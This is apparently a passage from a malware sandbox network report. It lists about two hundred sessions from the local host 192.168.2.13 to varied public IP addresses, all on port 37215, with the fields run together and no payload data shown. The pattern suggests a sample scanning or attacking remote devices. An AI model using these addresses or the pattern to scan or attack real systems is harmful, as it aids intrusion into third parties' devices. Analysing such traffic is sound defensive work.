                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9151192.168.2.1357530197.192.51.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9152192.168.2.134689041.114.15.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9153192.168.2.1358796157.168.248.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9154192.168.2.1353232157.59.137.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9155192.168.2.1341058197.16.129.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9156192.168.2.1352134197.173.93.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9157192.168.2.1358876157.201.164.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9158192.168.2.1347334197.255.53.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9159192.168.2.1341188157.147.156.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9160192.168.2.1333054157.19.34.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9161192.168.2.1351736103.82.92.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9162192.168.2.1350382216.221.148.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9163192.168.2.134507850.235.96.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9164192.168.2.1355284157.91.132.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9165192.168.2.134883841.125.151.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9166192.168.2.1359920157.74.61.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9167192.168.2.1336350197.206.10.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9168192.168.2.1350056157.188.206.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9169192.168.2.1340062109.121.58.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9170192.168.2.135582841.255.70.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9171192.168.2.1341750197.7.194.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9172192.168.2.135300041.70.222.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9173192.168.2.134799641.95.225.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9174192.168.2.1341454157.152.111.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9175192.168.2.1359244157.140.83.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9176192.168.2.1347956157.80.142.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9177192.168.2.1356374157.143.88.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9178192.168.2.133560641.236.42.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9179192.168.2.133436041.247.175.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9180192.168.2.1354066157.87.18.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9181192.168.2.1346972197.3.40.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9182192.168.2.133896641.249.167.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9183192.168.2.133773041.37.177.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9184192.168.2.1353054121.101.181.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9185192.168.2.1341668197.13.43.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9186192.168.2.1358226121.202.158.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9187192.168.2.1339496157.215.185.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9188192.168.2.1348318197.119.203.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9189192.168.2.1347288197.70.246.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9190192.168.2.1333728157.151.66.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9191192.168.2.135114282.233.241.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192192.168.2.133439841.207.45.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9193192.168.2.1338432197.22.173.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9194192.168.2.136021841.196.204.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9195192.168.2.1334000157.214.37.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9196192.168.2.1355924154.123.232.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9197192.168.2.134186441.62.126.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9198192.168.2.1337038160.154.79.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9199192.168.2.1345668197.190.199.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9200192.168.2.133470441.225.42.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9201192.168.2.134596441.64.235.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9202192.168.2.1345346110.43.66.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9203192.168.2.1337102157.143.41.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9204192.168.2.135251675.104.136.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9205192.168.2.134105841.205.33.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9206192.168.2.135791241.81.186.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9207192.168.2.1347314157.67.74.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9208192.168.2.135236034.186.58.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9209192.168.2.1335814197.128.61.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9210192.168.2.134517478.167.184.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9211192.168.2.135607041.215.6.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9212192.168.2.1357582157.187.102.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9213192.168.2.1345046197.156.107.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9214192.168.2.134978444.119.5.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9215192.168.2.1360818197.220.39.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9216192.168.2.1340480102.191.59.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9217192.168.2.134301441.27.134.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9218192.168.2.1337750223.164.199.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9219192.168.2.1342618157.193.211.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9220192.168.2.134107841.71.240.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9221192.168.2.1357384157.19.215.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9222192.168.2.1341750131.104.151.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9223192.168.2.1360460157.105.112.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9224192.168.2.135770041.189.161.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9225192.168.2.1335340157.17.59.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9226192.168.2.1339864157.55.103.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9227192.168.2.1333010197.147.150.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9228192.168.2.1360606157.32.106.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9229192.168.2.1347314221.25.13.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9230192.168.2.135619841.127.211.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9231192.168.2.1342642197.13.179.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9232192.168.2.133802441.60.183.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9233192.168.2.1355014197.106.163.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9234192.168.2.1336862100.58.102.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9235192.168.2.1338804197.6.124.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9236192.168.2.1346588157.244.201.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9237192.168.2.135348841.74.148.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9238192.168.2.134640041.52.223.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9239192.168.2.1353152197.36.204.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9240192.168.2.133699468.247.185.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9241192.168.2.134668441.196.242.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9242192.168.2.1342170157.245.72.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9243192.168.2.13541922.227.183.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9244192.168.2.1334538197.168.164.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9245192.168.2.1355276198.223.227.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9246192.168.2.135900641.236.189.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9247192.168.2.134765441.217.34.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9248192.168.2.1335584197.150.78.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9249192.168.2.1358282157.95.49.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9250192.168.2.1337352197.24.20.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9251192.168.2.1351700114.0.105.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9252192.168.2.1338404157.87.232.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9253192.168.2.1350928197.138.67.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9254192.168.2.1348574143.32.242.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9255192.168.2.1351480157.90.23.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9256192.168.2.1341778128.209.70.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9257192.168.2.135444066.50.197.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9258192.168.2.1355946157.56.175.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9259192.168.2.1341064197.16.11.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9260192.168.2.1340748197.207.115.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9261192.168.2.1336426197.92.139.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9262192.168.2.1343322197.228.178.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9263192.168.2.1347782157.136.4.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9264192.168.2.135028841.221.247.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9265192.168.2.1336812197.70.80.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9266192.168.2.1347002197.185.159.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9267192.168.2.135242441.113.142.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9268192.168.2.1353628157.221.217.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9269192.168.2.134118041.244.150.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9270192.168.2.133703866.245.154.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9271192.168.2.1360792197.244.203.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9272192.168.2.133872441.3.44.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9273192.168.2.135268041.79.67.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9274192.168.2.1351550187.46.210.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9275192.168.2.133473232.27.65.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9276192.168.2.1336958197.10.88.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9277192.168.2.1350080157.60.168.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9278192.168.2.1335976197.121.139.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9279192.168.2.1351808157.106.151.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9280192.168.2.1360900197.228.223.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9281192.168.2.1340334157.36.137.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9282192.168.2.1360124202.204.77.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9283192.168.2.133382041.38.50.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9284192.168.2.1357994116.217.42.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9285192.168.2.1347562197.10.13.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9286192.168.2.1359012131.90.243.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9287192.168.2.1335994157.29.124.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9288192.168.2.1342038157.244.240.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9289192.168.2.1354802197.84.20.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9290192.168.2.134543623.22.172.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9291192.168.2.135470041.235.76.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9292192.168.2.1357884197.18.5.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9293192.168.2.1355584157.83.105.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9294192.168.2.1340420157.18.112.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9295192.168.2.1347512131.249.169.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9296192.168.2.135143270.237.151.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9297192.168.2.1360350114.198.141.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9298192.168.2.135280441.84.58.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9299192.168.2.135086841.89.221.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9300192.168.2.135136441.148.157.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9301192.168.2.1360182146.224.95.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9302192.168.2.1341268157.86.65.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9303192.168.2.1345676197.62.249.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9304192.168.2.1356250222.123.33.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9305192.168.2.1360682153.32.65.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9306192.168.2.1347822157.0.251.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9307192.168.2.1333776155.169.64.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9308192.168.2.1333770157.232.179.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9309192.168.2.1355650197.83.208.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9310192.168.2.1342202197.218.132.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9311192.168.2.134314041.134.177.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9312192.168.2.134036041.167.135.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9313192.168.2.1341890157.139.243.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9314192.168.2.134175841.62.242.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9315192.168.2.1337062197.194.78.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9316192.168.2.133511041.155.222.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9317192.168.2.1339402197.230.192.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9318192.168.2.1340748197.90.94.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9319192.168.2.134926625.27.251.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9320192.168.2.133804241.91.246.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9321192.168.2.1356184157.105.140.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9322192.168.2.134249241.235.93.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9323192.168.2.1359800157.94.5.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9324192.168.2.135873278.81.227.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9325192.168.2.1341368197.215.238.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9326192.168.2.1360592157.50.199.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9327192.168.2.1332826197.35.103.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9328192.168.2.134622041.36.34.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9329192.168.2.135600441.249.84.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9330192.168.2.1333624197.150.103.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9331192.168.2.1333698157.55.56.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9332192.168.2.135299841.249.243.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9333192.168.2.1338322193.152.64.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9334192.168.2.1340830197.169.110.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9335192.168.2.1349832157.134.141.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9336192.168.2.1357348197.168.66.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9337192.168.2.134670078.111.128.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9338192.168.2.1340372116.104.18.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9339192.168.2.134999841.141.245.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9340192.168.2.1341190197.116.63.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9341192.168.2.135467041.6.255.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9342192.168.2.133407441.6.130.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9343192.168.2.1334816197.151.93.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9344192.168.2.1338384157.36.230.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9345192.168.2.1340598197.169.27.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9346192.168.2.135678441.68.176.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9347192.168.2.1349532197.233.97.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9348192.168.2.1342914197.202.94.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9349192.168.2.1339786157.164.118.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9350192.168.2.1351584193.65.77.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9351192.168.2.136028841.170.159.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9352192.168.2.13516961.23.250.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9353192.168.2.1344620140.10.37.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9354192.168.2.1347650197.171.178.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9355192.168.2.134112647.183.119.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9356192.168.2.1344606219.43.241.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9357192.168.2.135711041.220.153.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9358192.168.2.1351436157.214.129.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9359192.168.2.133946641.196.94.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
